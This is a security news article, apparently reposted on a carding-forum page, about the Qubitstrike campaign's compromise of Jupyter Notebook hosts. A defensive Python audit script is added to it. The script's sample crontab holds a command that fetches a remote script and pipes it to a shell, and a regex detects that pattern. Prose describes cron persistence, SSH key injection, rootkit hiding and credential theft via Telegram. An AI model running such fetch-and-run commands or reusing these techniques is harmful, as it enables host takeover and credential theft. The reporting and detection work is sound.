Tunisian hackers ruin cloud services: data from Jupyter Notebook under attack

Carding 4 Carders

The new campaign shows the ability of hackers to hide and gain control over the system.

Security researchers from the information security company Cado Security discovered a new cyber threat, presumably originating from Tunisia. The goal of the campaign, called Qubitstrike, is to attack vulnerable instances of Jupyter Notebook for mining cryptocurrency and hacking cloud environments.

The main attack tool involves using the Telegram API to export Jupyter Notebook credentials after a successful hack. All malicious files for the Qubitstrike campaign are hosted on the platform codeberg.org, an alternative to GitHub.

Technical analysis showed that after hacking public Jupyter instances, attackers execute commands to retrieve the shell script (mi.sh) from Codeberg. The script is responsible for launching the cryptocurrency miner, establishing persistence via a cron task, adding the attacker's SSH key to the ".ssh/authorized_keys" file for remote access, and distributing malware to other hosts via SSH.

The malware also installs the Diamorphine rootkit to hide malicious processes and transmit captured Amazon Web Services (AWS) and Google Cloud credentials via the Telegram API.

One notable aspect of the attack is the renaming of legitimate data transfer utilities, such as curl and wget. This is probably done to avoid detection and restrict other users' access to the tools.

The mi.sh script also iterates through a specified list of process names, terminating the processes of other miners that may have previously compromised the system. The campaign also includes using the netstat command to terminate network connections to IP addresses previously associated with cryptojacking campaigns. Attackers also delete various Linux log files to remain undetected.
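An added host-audit example (not from the article or from Cado Security) that checks a Linux host for the three traces described above: an authorized_keys entry that is not on an allow-list, a cron job that fetches a remote script and pipes it to a shell, and curl/wget missing from their usual paths (possibly renamed). The allow-listed key, the crontab lines and the repository path are constructed samples.

```python
import os
import re

# Constructed sample inputs; the key material and repository path are placeholders.
SAMPLE_AUTH_KEYS = """# admin key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey0000000000000000000000 admin@host
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCUnknownKeyMaterial attacker
"""
SAMPLE_CRONTAB = """0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s https://codeberg.org/placeholder/mi.sh | sh
"""
# Hypothetical allow-list: "keytype base64key" strings the administrator expects.
EXPECTED_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey0000000000000000000000"}
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")
# A URL followed later on the line by a pipe into sh or bash.
FETCH_PIPE = re.compile(r"https?://\S+.*\|\s*(ba)?sh\b")

def unexpected_keys(authorized_keys: str, expected: set) -> list:
    """Return authorized_keys entries whose key material is not on the allow-list."""
    hits = []
    for line in authorized_keys.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        # Skip any leading options field and locate "keytype base64key".
        for i, f in enumerate(fields):
            if f.startswith(KEY_TYPES) and i + 1 < len(fields):
                if f"{f} {fields[i + 1]}" not in expected:
                    hits.append(" ".join(fields))
                break
    return hits

def suspicious_cron(crontab: str) -> list:
    """Return cron lines that download a remote script and pipe it straight to a shell."""
    return [l for l in crontab.splitlines() if FETCH_PIPE.search(l)]

def missing_tools(present: set, tools=("curl", "wget")) -> list:
    """Return transfer tools absent from /usr/bin and /bin, which may mean they were renamed."""
    return [t for t in tools if not any(f"{d}/{t}" in present for d in ("/usr/bin", "/bin"))]

if __name__ == "__main__":
    print(unexpected_keys(SAMPLE_AUTH_KEYS, EXPECTED_KEYS))
    print(suspicious_cron(SAMPLE_CRONTAB))
    live = {p for d in ("/usr/bin", "/bin") for p in (f"{d}/curl", f"{d}/wget") if os.path.exists(p)}
    print(missing_tools(live))
```

On a real host, feed the functions the contents of each user's authorized_keys and crontab instead of the samples; the binary check already looks at the live filesystem in the usage block.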

The exact origin of the threat is unclear, but the IP address used to log in to the cloud-based honeypot with the stolen credentials points to Tunisia.

A study of the Codeberg repository also revealed a Python implant (kdfs.py), which is deployed on infected hosts and uses Discord as a command-and-control (C2) mechanism. How the mi.sh script and the kdfs.py Python implant communicate is not yet known, but it is assumed that the implant is intended for deploying a shell script.

Qubitstrike is a relatively sophisticated malware distribution campaign with a particular focus on exploiting cloud services. The ultimate goal of Qubitstrike, as experts have suggested, is to capture resources for mining the XMRig cryptocurrency. However, an analysis of the Discord C2 infrastructure shows that, in fact, after gaining access to vulnerable hosts, operators can carry out any possible attack.
 